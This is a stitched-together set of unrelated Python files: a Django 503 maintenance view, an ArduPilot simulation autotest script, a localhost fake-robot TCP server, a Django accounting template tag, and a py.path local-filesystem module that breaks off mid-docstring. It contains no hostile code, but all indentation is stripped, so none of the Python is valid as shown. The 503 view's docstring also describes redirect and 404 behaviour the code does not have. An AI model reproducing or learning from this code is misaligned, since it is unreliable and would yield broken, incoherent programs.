from django.template import Context, loader
from maintenancemode import http
def temporary_unavailable(request, template_name='503.html'):
"""
Default 503 handler, which looks for the requested URL in the redirects
table, redirects if found, and displays 404 page if not redirected.
Templates: `503.html`
Context:
request_path
The path of the requested URL (e.g., '/app/pages/bad_page/')
"""
t = loader.get_template(template_name) # You need to create a 503.html template.
return http.HttpResponseTemporaryUnavailable(t.render(Context({})))
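# A minimal wiring sketch (hypothetical, not part of this module): the
# django-maintenancemode middleware looks up ``handler503`` on the root
# URLconf, so a project would typically point it at this view, e.g.:
#
#     # urls.py
#     handler503 = 'path.to.this_module.temporary_unavailable'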
# ---------------------------------------------------------------------------
"""
APM automatic test suite
Andrew Tridgell, October 2011
"""
import atexit
import fnmatch
import glob
import optparse
import os
import shutil
import signal
import sys
import time
import traceback
import apmrover2
import arducopter
import arduplane
import quadplane
from pysim import util
os.environ['PYTHONUNBUFFERED'] = '1'
os.putenv('TMPDIR', util.reltopdir('tmp'))
def get_default_params(atype, binary):
"""Get default parameters."""
# use rover simulator so SITL is not starved of input
from pymavlink import mavutil
HOME = mavutil.location(40.071374969556928, -105.22978898137808, 1583.702759, 246)
if binary.find("plane") != -1 or binary.find("rover") != -1:
frame = "rover"
else:
frame = "+"
home = "%f,%f,%u,%u" % (HOME.lat, HOME.lng, HOME.alt, HOME.heading)
sitl = util.start_SITL(binary, wipe=True, model=frame, home=home, speedup=10, unhide_parameters=True)
mavproxy = util.start_MAVProxy_SITL(atype)
print("Dumping defaults")
idx = mavproxy.expect(['Please Run Setup', r'Saved [0-9]+ parameters to (\S+)'])
if idx == 0:
# we need to restart it after eeprom erase
util.pexpect_close(mavproxy)
util.pexpect_close(sitl)
sitl = util.start_SITL(binary, model=frame, home=home, speedup=10)
mavproxy = util.start_MAVProxy_SITL(atype)
idx = mavproxy.expect(r'Saved [0-9]+ parameters to (\S+)')
parmfile = mavproxy.match.group(1)
dest = util.reltopdir('../buildlogs/%s-defaults.parm' % atype)
shutil.copy(parmfile, dest)
util.pexpect_close(mavproxy)
util.pexpect_close(sitl)
print("Saved defaults for %s to %s" % (atype, dest))
return True
def build_all():
"""Run the build_all.sh script."""
print("Running build_all.sh")
if util.run_cmd(util.reltopdir('Tools/scripts/build_all.sh'), directory=util.reltopdir('.')) != 0:
print("Failed build_all.sh")
return False
return True
def build_binaries():
"""Run the build_binaries.sh script."""
print("Running build_binaries.sh")
# copy the script, since it switches git branches and could therefore
# change underneath us while running
orig = util.reltopdir('Tools/scripts/build_binaries.sh')
copy = util.reltopdir('./build_binaries.sh')
shutil.copyfile(orig, copy)
shutil.copymode(orig, copy)
if util.run_cmd(copy, directory=util.reltopdir('.')) != 0:
print("Failed build_binaries.sh")
return False
return True
def build_devrelease():
"""Run the build_devrelease.sh script."""
print("Running build_devrelease.sh")
# copy the script, since it switches git branches and could therefore
# change underneath us while running
orig = util.reltopdir('Tools/scripts/build_devrelease.sh')
copy = util.reltopdir('./build_devrelease.sh')
shutil.copyfile(orig, copy)
shutil.copymode(orig, copy)
if util.run_cmd(copy, directory=util.reltopdir('.')) != 0:
print("Failed build_devrelease.sh")
return False
return True
def build_examples():
"""Build examples."""
for target in 'px4-v2', 'navio':
print("Running build.examples for %s" % target)
try:
util.build_examples(target)
except Exception as e:
print("Failed build_examples on board=%s" % target)
print(str(e))
return False
return True
def build_parameters():
"""Run the param_parse.py script."""
print("Running param_parse.py")
if util.run_cmd(util.reltopdir('Tools/autotest/param_metadata/param_parse.py'), directory=util.reltopdir('.')) != 0:
print("Failed param_parse.py")
return False
return True
def convert_gpx():
"""Convert any tlog files to GPX and KML."""
mavlog = glob.glob(util.reltopdir("../buildlogs/*.tlog"))
for m in mavlog:
util.run_cmd(util.reltopdir("modules/mavlink/pymavlink/tools/mavtogpx.py") + " --nofixcheck " + m)
gpx = m + '.gpx'
kml = m + '.kml'
util.run_cmd('gpsbabel -i gpx -f %s -o kml,units=m,floating=1,extrude=1 -F %s' % (gpx, kml), checkfail=False)
util.run_cmd('zip %s.kmz %s.kml' % (m, m), checkfail=False)
util.run_cmd("mavflightview.py --imagefile=%s.png %s" % (m, m))
return True
def test_prerequisites():
"""Check we have the right directories and tools to run tests."""
print("Testing prerequisites")
util.mkdir_p(util.reltopdir('../buildlogs'))
return True
def alarm_handler(signum, frame):
"""Handle test timeout."""
global results, opts
try:
results.add('TIMEOUT', '<span class="failed-text">FAILED</span>', opts.timeout)
util.pexpect_close_all()
convert_gpx()
write_fullresults()
os.killpg(0, signal.SIGKILL)
except Exception:
pass
sys.exit(1)
parser = optparse.OptionParser("autotest")
parser.add_option("--skip", type='string', default='', help='list of steps to skip (comma separated)')
parser.add_option("--list", action='store_true', default=False, help='list the available steps')
parser.add_option("--viewerip", default=None, help='IP address to send MAVLink and fg packets to')
parser.add_option("--map", action='store_true', default=False, help='show map')
parser.add_option("--experimental", default=False, action='store_true', help='enable experimental tests')
parser.add_option("--timeout", default=3000, type='int', help='maximum runtime in seconds')
parser.add_option("--valgrind", default=False, action='store_true', help='run ArduPilot binaries under valgrind')
parser.add_option("--gdb", default=False, action='store_true', help='run ArduPilot binaries under gdb')
parser.add_option("--debug", default=False, action='store_true', help='make built binaries debug binaries')
parser.add_option("-j", default=None, type='int', help='build CPUs')
opts, args = parser.parse_args()
steps = [
'prerequisites',
'build.All',
'build.Binaries',
# 'build.DevRelease',
'build.Examples',
'build.Parameters',
'build.ArduPlane',
'defaults.ArduPlane',
'fly.ArduPlane',
'fly.QuadPlane',
'build.APMrover2',
'defaults.APMrover2',
'drive.APMrover2',
'build.ArduCopter',
'defaults.ArduCopter',
'fly.ArduCopter',
'build.Helicopter',
'fly.CopterAVC',
'build.AntennaTracker',
'convertgpx',
]
skipsteps = opts.skip.split(',')
signal.signal(signal.SIGALRM, alarm_handler)
signal.alarm(opts.timeout)
if opts.list:
for step in steps:
print(step)
sys.exit(0)
def skip_step(step):
"""See if a step should be skipped."""
for skip in skipsteps:
if fnmatch.fnmatch(step.lower(), skip.lower()):
return True
return False
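# For example (illustrative only): passing ``--skip "fly.*,build.Binaries"``
# would skip every fly step as well as the binaries build, since each
# comma-separated pattern is matched case-insensitively via fnmatch.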
def binary_path(step, debug=False):
if step.find("ArduCopter") != -1:
binary_name = "arducopter-quad"
elif step.find("ArduPlane") != -1:
binary_name = "arduplane"
elif step.find("APMrover2") != -1:
binary_name = "ardurover"
elif step.find("AntennaTracker") != -1:
binary_name = "antennatracker"
elif step.find("CopterAVC") != -1:
binary_name = "arducopter-heli"
elif step.find("QuadPlane") != -1:
binary_name = "arduplane"
else:
# cope with builds that don't have a specific binary
return None
if debug:
binary_basedir = "sitl-debug"
else:
binary_basedir = "sitl"
binary = util.reltopdir(os.path.join('build', binary_basedir, 'bin', binary_name))
if not os.path.exists(binary):
if os.path.exists(binary + ".exe"):
binary += ".exe"
else:
raise ValueError("Binary (%s) does not exist" % (binary,))
return binary
def run_step(step):
"""Run one step."""
# remove old logs
util.run_cmd('/bin/rm -f logs/*.BIN logs/LASTLOG.TXT')
if step == "prerequisites":
return test_prerequisites()
if step == 'build.ArduPlane':
return util.build_SITL('bin/arduplane', j=opts.j, debug=opts.debug)
if step == 'build.APMrover2':
return util.build_SITL('bin/ardurover', j=opts.j, debug=opts.debug)
if step == 'build.ArduCopter':
return util.build_SITL('bin/arducopter-quad', j=opts.j, debug=opts.debug)
if step == 'build.AntennaTracker':
return util.build_SITL('bin/antennatracker', j=opts.j, debug=opts.debug)
if step == 'build.Helicopter':
return util.build_SITL('bin/arducopter-heli', j=opts.j, debug=opts.debug)
binary = binary_path(step, debug=opts.debug)
if step == 'defaults.ArduPlane':
return get_default_params('ArduPlane', binary)
if step == 'defaults.ArduCopter':
return get_default_params('ArduCopter', binary)
if step == 'defaults.APMrover2':
return get_default_params('APMrover2', binary)
if step == 'fly.ArduCopter':
return arducopter.fly_ArduCopter(binary, viewerip=opts.viewerip, use_map=opts.map, valgrind=opts.valgrind, gdb=opts.gdb)
if step == 'fly.CopterAVC':
return arducopter.fly_CopterAVC(binary, viewerip=opts.viewerip, use_map=opts.map, valgrind=opts.valgrind, gdb=opts.gdb)
if step == 'fly.ArduPlane':
return arduplane.fly_ArduPlane(binary, viewerip=opts.viewerip, use_map=opts.map, valgrind=opts.valgrind, gdb=opts.gdb)
if step == 'fly.QuadPlane':
return quadplane.fly_QuadPlane(binary, viewerip=opts.viewerip, use_map=opts.map, valgrind=opts.valgrind, gdb=opts.gdb)
if step == 'drive.APMrover2':
return apmrover2.drive_APMrover2(binary, viewerip=opts.viewerip, use_map=opts.map, valgrind=opts.valgrind, gdb=opts.gdb)
if step == 'build.All':
return build_all()
if step == 'build.Binaries':
return build_binaries()
if step == 'build.DevRelease':
return build_devrelease()
if step == 'build.Examples':
return build_examples()
if step == 'build.Parameters':
return build_parameters()
if step == 'convertgpx':
return convert_gpx()
raise RuntimeError("Unknown step %s" % step)
class TestResult(object):
"""Test result class."""
def __init__(self, name, result, elapsed):
self.name = name
self.result = result
self.elapsed = "%.1f" % elapsed
class TestFile(object):
"""Test result file."""
def __init__(self, name, fname):
self.name = name
self.fname = fname
class TestResults(object):
"""Test results class."""
def __init__(self):
self.date = time.asctime()
self.githash = util.run_cmd('git rev-parse HEAD', output=True, directory=util.reltopdir('.')).strip()
self.tests = []
self.files = []
self.images = []
def add(self, name, result, elapsed):
"""Add a result."""
self.tests.append(TestResult(name, result, elapsed))
def addfile(self, name, fname):
"""Add a result file."""
self.files.append(TestFile(name, fname))
def addimage(self, name, fname):
"""Add a result image."""
self.images.append(TestFile(name, fname))
def addglob(self, name, pattern):
"""Add a set of files."""
for f in glob.glob(util.reltopdir('../buildlogs/%s' % pattern)):
self.addfile(name, os.path.basename(f))
def addglobimage(self, name, pattern):
"""Add a set of images."""
for f in glob.glob(util.reltopdir('../buildlogs/%s' % pattern)):
self.addimage(name, os.path.basename(f))
def write_webresults(results_to_write):
"""Write webpage results."""
from pymavlink.generator import mavtemplate
t = mavtemplate.MAVTemplate()
for h in glob.glob(util.reltopdir('Tools/autotest/web/*.html')):
html = util.loadfile(h)
f = open(util.reltopdir("../buildlogs/%s" % os.path.basename(h)), mode='w')
t.write(f, html, results_to_write)
f.close()
for f in glob.glob(util.reltopdir('Tools/autotest/web/*.png')):
shutil.copy(f, util.reltopdir('../buildlogs/%s' % os.path.basename(f)))
def write_fullresults():
"""Write out full results set."""
global results
results.addglob("Google Earth track", '*.kmz')
results.addfile('Full Logs', 'autotest-output.txt')
results.addglob('DataFlash Log', '*-log.bin')
results.addglob("MAVLink log", '*.tlog')
results.addglob("GPX track", '*.gpx')
results.addfile('ArduPlane build log', 'ArduPlane.txt')
results.addfile('ArduPlane code size', 'ArduPlane.sizes.txt')
results.addfile('ArduPlane stack sizes', 'ArduPlane.framesizes.txt')
results.addfile('ArduPlane defaults', 'default_params/ArduPlane-defaults.parm')
results.addglob("ArduPlane log", 'ArduPlane-*.BIN')
results.addglob("ArduPlane core", 'ArduPlane.core')
results.addglob("ArduPlane ELF", 'ArduPlane.elf')
results.addfile('ArduCopter build log', 'ArduCopter.txt')
results.addfile('ArduCopter code size', 'ArduCopter.sizes.txt')
results.addfile('ArduCopter stack sizes', 'ArduCopter.framesizes.txt')
results.addfile('ArduCopter defaults', 'default_params/ArduCopter-defaults.parm')
results.addglob("ArduCopter log", 'ArduCopter-*.BIN')
results.addglob("ArduCopter core", 'ArduCopter.core')
results.addglob("ArduCopter elf", 'ArduCopter.elf')
results.addglob("CopterAVC log", 'CopterAVC-*.BIN')
results.addglob("CopterAVC core", 'CopterAVC.core')
results.addfile('APMrover2 build log', 'APMrover2.txt')
results.addfile('APMrover2 code size', 'APMrover2.sizes.txt')
results.addfile('APMrover2 stack sizes', 'APMrover2.framesizes.txt')
results.addfile('APMrover2 defaults', 'default_params/APMrover2-defaults.parm')
results.addglob("APMrover2 log", 'APMrover2-*.BIN')
results.addglob("APMrover2 core", 'APMrover2.core')
results.addglob("APMrover2 ELF", 'APMrover2.elf')
results.addfile('AntennaTracker build log', 'AntennaTracker.txt')
results.addfile('AntennaTracker code size', 'AntennaTracker.sizes.txt')
results.addfile('AntennaTracker stack sizes', 'AntennaTracker.framesizes.txt')
results.addglob("AntennaTracker ELF", 'AntennaTracker.elf')
results.addglob('APM:Libraries documentation', 'docs/libraries/index.html')
results.addglob('APM:Plane documentation', 'docs/ArduPlane/index.html')
results.addglob('APM:Copter documentation', 'docs/ArduCopter/index.html')
results.addglob('APM:Rover documentation', 'docs/APMrover2/index.html')
results.addglobimage("Flight Track", '*.png')
write_webresults(results)
results = TestResults()
def check_logs(step):
"""Check for log files from a step."""
print("check step: ", step)
if step.startswith('fly.'):
vehicle = step[4:]
elif step.startswith('drive.'):
vehicle = step[6:]
else:
return
logs = glob.glob("logs/*.BIN")
for log in logs:
bname = os.path.basename(log)
newname = util.reltopdir("../buildlogs/%s-%s" % (vehicle, bname))
print("Renaming %s to %s" % (log, newname))
os.rename(log, newname)
corefile = "core"
if os.path.exists(corefile):
newname = util.reltopdir("../buildlogs/%s.core" % vehicle)
print("Renaming %s to %s" % (corefile, newname))
os.rename(corefile, newname)
util.run_cmd('/bin/cp A*/A*.elf ../buildlogs', directory=util.reltopdir('.'))
def run_tests(steps):
"""Run a list of steps."""
global results
passed = True
failed = []
for step in steps:
util.pexpect_close_all()
if skip_step(step):
continue
t1 = time.time()
print(">>>> RUNNING STEP: %s at %s" % (step, time.asctime()))
try:
if not run_step(step):
print(">>>> FAILED STEP: %s at %s" % (step, time.asctime()))
passed = False
failed.append(step)
results.add(step, '<span class="failed-text">FAILED</span>', time.time() - t1)
continue
except Exception as msg:
passed = False
failed.append(step)
print(">>>> FAILED STEP: %s at %s (%s)" % (step, time.asctime(), msg))
traceback.print_exc(file=sys.stdout)
results.add(step, '<span class="failed-text">FAILED</span>', time.time() - t1)
check_logs(step)
continue
results.add(step, '<span class="passed-text">PASSED</span>', time.time() - t1)
print(">>>> PASSED STEP: %s at %s" % (step, time.asctime()))
check_logs(step)
if not passed:
print("FAILED %u tests: %s" % (len(failed), failed))
util.pexpect_close_all()
write_fullresults()
return passed
util.mkdir_p(util.reltopdir('../buildlogs'))
lckfile = util.reltopdir('../buildlogs/autotest.lck')
lck = util.lock_file(lckfile)
if lck is None:
print("autotest is locked - exiting. lckfile=(%s)" % (lckfile,))
sys.exit(0)
atexit.register(util.pexpect_close_all)
if len(args) > 0:
# allow a wildcard list of steps
matched = []
for a in args:
arg_matched = False
for s in steps:
if fnmatch.fnmatch(s.lower(), a.lower()):
matched.append(s)
arg_matched = True
if not arg_matched:
print("No steps matched argument ({})".format(a))
sys.exit(1)
steps = matched
try:
if not run_tests(steps):
sys.exit(1)
except KeyboardInterrupt:
util.pexpect_close_all()
sys.exit(1)
except Exception:
# make sure we kill off any children
util.pexpect_close_all()
raise
# ---------------------------------------------------------------------------
import socket
import threading
import socketserver
import time
class RequestHandler(socketserver.BaseRequestHandler):
def handle(self):
while True:
data = str(self.request.recv(1024), 'ascii')
cur_thread = threading.current_thread()
print("{} received {} from {}".format(cur_thread.name, data, self.client_address) )
if data == "":
return
#when this methods returns, the connection to the client closes
def setup(self):
print("Got new connection from {}".format( self.client_address) )
self.server.handlers.append(self)
def finish(self):
print("Connection from {} lost".format( self.client_address) )
self.server.handlers.remove(self)
class Server(socketserver.ThreadingMixIn, socketserver.TCPServer):
def init(self):
"""
__init__ should not be overridden
"""
self.handlers = []
def close(self):
for handler in self.handlers:
handler.request.shutdown(socket.SHUT_RDWR)
handler.request.close()
self.shutdown()
class FakeRobot(object):
def run(self):
host = "localhost"
port = 30002
server = Server((host, port), RequestHandler)
server.init()
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
print("Fake Universal robot running at ", host, port)
try:
f = open("packet.bin", "rb")
packet = f.read()
f.close()
while True:
time.sleep(0.09)  # the real robot publishes data 10 times a second
for handler in server.handlers:
handler.request.sendall(packet)
finally:
print("Shutting down server")
server.close()
if __name__ == "__main__":
r = FakeRobot()
r.run()
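# A minimal client sketch (hypothetical, for manual testing against the
# fake robot above):
#
#     import socket
#     s = socket.create_connection(("localhost", 30002))
#     packet = s.recv(4096)  # the server replays the recorded packet ~10x/sec
#     s.close()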
# ---------------------------------------------------------------------------
from django.template import Library
register = Library()
@register.inclusion_tag("accountings/acct_entry_item.html", takes_context=True)
def acct_entry_item(context, acct_entry, entry_class=''):
acct_trans = acct_entry.trans.all()
# calculate the total_debit and total_credit and update the context
for acct_tran in acct_trans:
if acct_tran.amount > 0:
context['total_debit'] += acct_tran.amount
if acct_tran.amount < 0:
context['total_credit'] += abs(acct_tran.amount)
context.update({
'acct_trans': acct_trans,
'entry_class': entry_class
})
return context
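# A minimal template usage sketch (hypothetical; assumes this module is
# registered as a template tag library and that ``total_debit`` and
# ``total_credit`` are already seeded in the context):
#
#     {% load <this tag library> %}
#     {% acct_entry_item entry %}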
# ---------------------------------------------------------------------------
"""
local path implementation.
"""
from __future__ import with_statement
from contextlib import contextmanager
import sys, os, re, atexit, io
import py
from py._path import common
from py._path.common import iswin32, fspath
from stat import S_ISLNK, S_ISDIR, S_ISREG
from os.path import abspath, normcase, normpath, isabs, exists, isdir, isfile, islink, dirname
if sys.version_info > (3,0):
def map_as_list(func, iter):
return list(map(func, iter))
else:
map_as_list = map
class Stat(object):
def __getattr__(self, name):
return getattr(self._osstatresult, "st_" + name)
def __init__(self, path, osstatresult):
self.path = path
self._osstatresult = osstatresult
@property
def owner(self):
if iswin32:
raise NotImplementedError("XXX win32")
import pwd
entry = py.error.checked_call(pwd.getpwuid, self.uid)
return entry[0]
@property
def group(self):
""" return group name of file. """
if iswin32:
raise NotImplementedError("XXX win32")
import grp
entry = py.error.checked_call(grp.getgrgid, self.gid)
return entry[0]
def isdir(self):
return S_ISDIR(self._osstatresult.st_mode)
def isfile(self):
return S_ISREG(self._osstatresult.st_mode)
def islink(self):
st = self.path.lstat()
return S_ISLNK(st.mode)
class PosixPath(common.PathBase):
def chown(self, user, group, rec=0):
""" change ownership to the given user and group.
user and group may be specified by a number or
by a name. if rec is True change ownership
recursively.
"""
uid = getuserid(user)
gid = getgroupid(group)
if rec:
for x in self.visit(rec=lambda x: x.check(link=0)):
if x.check(link=0):
py.error.checked_call(os.chown, str(x), uid, gid)
py.error.checked_call(os.chown, str(self), uid, gid)
def readlink(self):
""" return value of a symbolic link. """
return py.error.checked_call(os.readlink, self.strpath)
def mklinkto(self, oldname):
""" posix style hard link to another name. """
py.error.checked_call(os.link, str(oldname), str(self))
def mksymlinkto(self, value, absolute=1):
""" create a symbolic link with the given value (pointing to another name). """
if absolute:
py.error.checked_call(os.symlink, str(value), self.strpath)
else:
base = self.common(value)
# with posix local paths '/' is always a common base
relsource = self.__class__(value).relto(base)
reldest = self.relto(base)
n = reldest.count(self.sep)
target = self.sep.join(('..', )*n + (relsource, ))
py.error.checked_call(os.symlink, target, self.strpath)
def getuserid(user):
import pwd
if not isinstance(user, int):
user = pwd.getpwnam(user)[2]
return user
def getgroupid(group):
import grp
if not isinstance(group, int):
group = grp.getgrnam(group)[2]
return group
FSBase = PosixPath if not iswin32 else common.PathBase
class LocalPath(FSBase):
""" object oriented interface to os.path and other local filesystem
related information.
"""
class ImportMismatchError(ImportError):
""" raised on pyimport() if there is a mismatch of __file__'s"""
sep = os.sep
class Checkers(common.Checkers):
def _stat(self):
try:
return self._statcache
except AttributeError:
try:
self._statcache = self.path.stat()
except py.error.ELOOP:
self._statcache = self.path.lstat()
return self._statcache
def dir(self):
return S_ISDIR(self._stat().mode)
def file(self):
return S_ISREG(self._stat().mode)
def exists(self):
return self._stat()
def link(self):
st = self.path.lstat()
return S_ISLNK(st.mode)
def __init__(self, path=None, expanduser=False):
""" Initialize and return a local Path instance.
Path can be relative to the current directory.
If path is None it defaults to the current working directory.
If expanduser is True, tilde-expansion is performed.
Note that Path instances always carry an absolute path.
Note also that passing in a local path object will simply return
the exact same path object. Use new() to get a new copy.
"""
if path is None:
self.strpath = py.error.checked_call(os.getcwd)
else:
try:
path = fspath(path)
except TypeError:
raise ValueError("can only pass None, Path instances "
"or non-empty strings to LocalPath")
if expanduser:
path = os.path.expanduser(path)
self.strpath = abspath(path)
def __hash__(self):
return hash(self.strpath)
def __eq__(self, other):
s1 = fspath(self)
try:
s2 = fspath(other)
except TypeError:
return False
if iswin32:
s1 = s1.lower()
try:
s2 = s2.lower()
except AttributeError:
return False
return s1 == s2
def __ne__(self, other):
return not (self == other)
def __lt__(self, other):
return fspath(self) < fspath(other)
def __gt__(self, other):
return fspath(self) > fspath(other)
def samefile(self, other):
""" return True if 'other' references the same file as 'self'.
"""
other = fspath(other)
if not isabs(other):
other = abspath(other)
if self == other:
return True
if iswin32:
return False # there is no samefile
return py.error.checked_call(
os.path.samefile, self.strpath, other)
def remove(self, rec=1, ignore_errors=False):
""" remove a file or directory (or a directory tree if rec=1).
if ignore_errors is True, errors while removing directories will
be ignored.
"""
if self.check(dir=1, link=0):
if rec:
# force remove of readonly files on windows
if iswin32:
self.chmod(0o700, rec=1)
py.error.checked_call(py.std.shutil.rmtree, self.strpath,
ignore_errors=ignore_errors)
else:
py.error.checked_call(os.rmdir, self.strpath)
else:
if iswin32:
self.chmod(0o700)
py.error.checked_call(os.remove, self.strpath)
def computehash(self, hashtype="md5", chunksize=524288):
""" return hexdigest of hashvalue for this file. """
try:
try:
import hashlib as mod
except ImportError:
if hashtype == "sha1":
hashtype = "sha"
mod = __import__(hashtype)
hash = getattr(mod, hashtype)()
except (AttributeError, ImportError):
raise ValueError("Don't know how to compute %r hash" %(hashtype,))
f = self.open('rb')
try:
while 1:
buf = f.read(chunksize)
if not buf:
return hash.hexdigest()
hash.update(buf)
finally:
f.close()
def new(self, **kw):
""" create a modified version of this path.
the following keyword arguments modify various path parts::
a:/some/path/to/a/file.ext
xx drive
xxxxxxxxxxxxxxxxx dirname
xxxxxxxx basename
xxxx purebasename
xxx ext
"""
obj = object.__new__(self.__class__)
if not kw:
obj.strpath = self.strpath
return obj
drive, dirname, basename, purebasename,ext = self._getbyspec(
"drive,dirname,basename,purebasename,ext")
if 'basename' in kw:
if 'purebasename' in kw or 'ext' in kw:
raise ValueError("invalid specification %r" % kw)
else:
pb = kw.setdefault('purebasename', purebasename)
try:
ext = kw['ext']
except KeyError:
pass
else:
if ext and not ext.startswith('.'):
ext = '.' + ext
kw['basename'] = pb + ext
if ('dirname' in kw and not kw['dirname']):
kw['dirname'] = drive
else:
kw.setdefault('dirname', dirname)
kw.setdefault('sep', self.sep)
obj.strpath = normpath(
"%(dirname)s%(sep)s%(basename)s" % kw)
return obj
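# Illustrative examples of new() (given p = local('/some/path/to/a/file.ext')):
#     p.new(ext='.txt')            -> '/some/path/to/a/file.txt'
#     p.new(purebasename='file2')  -> '/some/path/to/a/file2.ext'
#     p.new(basename='other.cfg')  -> '/some/path/to/a/other.cfg'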
def _getbyspec(self, spec):
""" see new for what 'spec' can be. """
res = []
parts = self.strpath.split(self.sep)
args = filter(None, spec.split(',') )
append = res.append
for name in args:
if name == 'drive':
append(parts[0])
elif name == 'dirname':
append(self.sep.join(parts[:-1]))
else:
basename = parts[-1]
if name == 'basename':
append(basename)
else:
i = basename.rfind('.')
if i == -1:
purebasename, ext = basename, ''
else:
purebasename, ext = basename[:i], basename[i:]
if name == 'purebasename':
append(purebasename)
elif name == 'ext':
append(ext)
else:
raise ValueError("invalid part specification %r" % name)
return res
def dirpath(self, *args, **kwargs):
""" return the directory path joined with any given path arguments. """
if not kwargs:
path = object.__new__(self.__class__)
path.strpath = dirname(self.strpath)
if args:
path = path.join(*args)
return path
return super(LocalPath, self).dirpath(*args, **kwargs)
def join(self, *args, **kwargs):
""" return a new path by appending all 'args' as path
components. if abs=1 is used restart from root if any
of the args is an absolute path.
"""
sep = self.sep
strargs = [fspath(arg) for arg in args]
strpath = self.strpath
if kwargs.get('abs'):
newargs = []
for arg in reversed(strargs):
if isabs(arg):
strpath = arg
strargs = newargs
break
newargs.insert(0, arg)
for arg in strargs:
arg = arg.strip(sep)
if iswin32:
# allow unix style paths even on windows.
arg = arg.strip('/')
arg = arg.replace('/', sep)
strpath = strpath + sep + arg
obj = object.__new__(self.__class__)
obj.strpath = normpath(strpath)
return obj
def open(self, mode='r', ensure=False, encoding=None):
""" return an opened file with the given mode.
If ensure is True, create parent directories if needed.
"""
if ensure:
self.dirpath().ensure(dir=1)
if encoding:
return py.error.checked_call(io.open, self.strpath, mode, encoding=encoding)
return py.error.checked_call(open, self.strpath, mode)
def _fastjoin(self, name):
child = object.__new__(self.__class__)
child.strpath = self.strpath + self.sep + name
return child
def islink(self):
return islink(self.strpath)
def check(self, **kw):
if not kw:
return exists(self.strpath)
if len(kw) == 1:
if "dir" in kw:
return not kw["dir"] ^ isdir(self.strpath)
if "file" in kw:
return not kw["file"] ^ isfile(self.strpath)
return super(LocalPath, self).check(**kw)
_patternchars = set("*?[" + os.path.sep)
def listdir(self, fil=None, sort=None):
""" list directory contents, possibly filter by the given fil func
and possibly sorted.
"""
if fil is None and sort is None:
names = py.error.checked_call(os.listdir, self.strpath)
return map_as_list(self._fastjoin, names)
if isinstance(fil, py.builtin._basestring):
if not self._patternchars.intersection(fil):
child = self._fastjoin(fil)
if exists(child.strpath):
return [child]
return []
fil = common.FNMatcher(fil)
names = py.error.checked_call(os.listdir, self.strpath)
res = []
for name in names:
child = self._fastjoin(name)
if fil is None or fil(child):
res.append(child)
self._sortlist(res, sort)
return res
def size(self):
""" return size of the underlying file object """
return self.stat().size
def mtime(self):
""" return last modification time of the path. """
return self.stat().mtime
def copy(self, target, mode=False, stat=False):
""" copy path to target.
If mode is True, will copy permission from path to target.
If stat is True, copy permission, last modification
time, last access time, and flags from path to target.
"""
if self.check(file=1):
if target.check(dir=1):
target = target.join(self.basename)
assert self != target
copychunked(self, target)
if mode:
copymode(self.strpath, target.strpath)
if stat:
copystat(self, target)
else:
def rec(p):
return p.check(link=0)
for x in self.visit(rec=rec):
relpath = x.relto(self)
newx = target.join(relpath)
newx.dirpath().ensure(dir=1)
if x.check(link=1):
newx.mksymlinkto(x.readlink())
continue
elif x.check(file=1):
copychunked(x, newx)
elif x.check(dir=1):
newx.ensure(dir=1)
if mode:
copymode(x.strpath, newx.strpath)
if stat:
copystat(x, newx)
def rename(self, target):
""" rename this path to target. """
target = fspath(target)
return py.error.checked_call(os.rename, self.strpath, target)
def dump(self, obj, bin=1):
""" pickle object into path location"""
f = self.open('wb')
try:
py.error.checked_call(py.std.pickle.dump, obj, f, bin)
finally:
f.close()
def mkdir(self, *args):
""" create & return the directory joined with args. """
p = self.join(*args)
py.error.checked_call(os.mkdir, fspath(p))
return p
def write_binary(self, data, ensure=False):
""" write binary data into path. If ensure is True create
missing parent directories.
"""
if ensure:
self.dirpath().ensure(dir=1)
with self.open('wb') as f:
f.write(data)
def write_text(self, data, encoding, ensure=False):
""" write text data into path using the specified encoding.
If ensure is True create missing parent directories.
"""
if ensure:
self.dirpath().ensure(dir=1)
with self.open('w', encoding=encoding) as f:
f.write(data)
def write(self, data, mode='w', ensure=False):
""" write data into path. If ensure is True create
missing parent directories.
"""
if ensure:
self.dirpath().ensure(dir=1)
if 'b' in mode:
if not py.builtin._isbytes(data):
raise ValueError("can only process bytes")
else:
if not py.builtin._istext(data):
if not py.builtin._isbytes(data):
data = str(data)
else:
data = py.builtin._totext(data, sys.getdefaultencoding())
f = self.open(mode)
try:
f.write(data)
finally:
f.close()
def _ensuredirs(self):
parent = self.dirpath()
if parent == self:
return self
if parent.check(dir=0):
parent._ensuredirs()
if self.check(dir=0):
try:
self.mkdir()
except py.error.EEXIST:
# race condition: file/dir created by another thread/process.
# complain if it is not a dir
if self.check(dir=0):
raise
return self
def ensure(self, *args, **kwargs):
""" ensure that an args-joined path exists (by default as
a file). if you specify a keyword argument 'dir=True'
then the path is forced to be a directory path.
"""
p = self.join(*args)
if kwargs.get('dir', 0):
return p._ensuredirs()
else:
p.dirpath()._ensuredirs()
if not p.check(file=1):
p.open('w').close()
return p
def stat(self, raising=True):
""" Return an os.stat() tuple. """
if raising:
return Stat(self, py.error.checked_call(os.stat, self.strpath))
try:
return Stat(self, os.stat(self.strpath))
except KeyboardInterrupt:
raise
except Exception:
return None
def lstat(self):
""" Return an os.lstat() tuple. """
return Stat(self, py.error.checked_call(os.lstat, self.strpath))
def setmtime(self, mtime=None):
""" set modification time for the given path. if 'mtime' is None
(the default) then the file's mtime is set to current time.
Note that the resolution for 'mtime' is platform dependent.
"""
if mtime is None:
return py.error.checked_call(os.utime, self.strpath, mtime)
try:
return py.error.checked_call(os.utime, self.strpath, (-1, mtime))
except py.error.EINVAL:
return py.error.checked_call(os.utime, self.strpath, (self.atime(), mtime))
def chdir(self):
""" change directory to self and return old current directory """
try:
old = self.__class__()
except py.error.ENOENT:
old = None
py.error.checked_call(os.chdir, self.strpath)
return old
@contextmanager
def as_cwd(self):
""" return context manager which changes to current dir during the
managed "with" context. On __enter__ it returns the old dir.
"""
old = self.chdir()
try:
yield old
finally:
old.chdir()
def realpath(self):
""" return a new path which contains no symbolic links."""
return self.__class__(os.path.realpath(self.strpath))
def atime(self):
""" return last access time of the path. """
return self.stat().atime
def __repr__(self):
return 'local(%r)' % self.strpath
def __str__(self):
""" return string representation of the Path. """
return self.strpath
def chmod(self, mode, rec=0):
""" change permissions to the given mode. If mode is an
integer it directly encodes the os-specific modes.
if rec is True perform recursively.
"""
if not isinstance(mode, int):
raise TypeError("mode %r must be an integer" % (mode,))
if rec:
for x in self.visit(rec=rec):
py.error.checked_call(os.chmod, str(x), mode)
py.error.checked_call(os.chmod, self.strpath, mode)
def pypkgpath(self):
""" return the Python package path by looking for the last
